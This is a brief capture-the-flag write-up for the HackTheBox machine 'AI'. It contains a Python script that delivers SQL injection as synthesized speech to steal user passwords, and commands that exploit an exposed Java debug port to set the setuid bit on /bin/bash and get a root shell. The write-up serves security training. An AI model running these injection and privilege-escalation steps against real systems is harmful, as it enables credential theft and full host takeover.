AI @ HackTheBox
AI is a 30 point machine on HackTheBox that involves SQL injection via speech and abusing an exposed java debugging port.
Notes
SQL injection helper:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
#!/usr/bin/env python
import subprocess
import requests
import shutil
import json
import sys
import re
msg = sys.argv[1]
# text to speech
headers = {'Content-type' : 'application/x-www-form-urlencoded'}
url = 'https://ttsmp3.com/makemp3_new.php'
r = requests.post(url, data={'msg': msg, 'lang':'Joey','source':'ttsmp3'}, headers=headers)
# download result
url = json.loads(r.text)['URL']
r = requests.get(url, stream=True)
with open('tmp.mp3', 'wb') as f:
shutil.copyfileobj(r.raw, f)
# convert
subprocess.call(['ffmpeg', '-i', 'tmp.mp3',
'tmp.wav'])
# upload & check result
url = 'http://ai.htb/ai.php'
files = {'fileToUpload': open('tmp.wav','rb')}
r = requests.post(url, files=files, data={'submit':'Process It!'})
print(r.text)
Use helper to get the users password:
1
python3 inject.py 'open single kwote. union select password from users comment database'
Exploit jdwp (with port forwarded to localhost):
1
2
3
4
5
searchsploit -x jdwp
searchsploit -m exploits/java/remote/46501.py
python 46501.py -t localhost -p 8000 --cmd "chmod u+s /bin/bash"
curl http://127.0.0.1:8005
/bin/bash -p
This post is licensed under CC BY 4.0 by the author.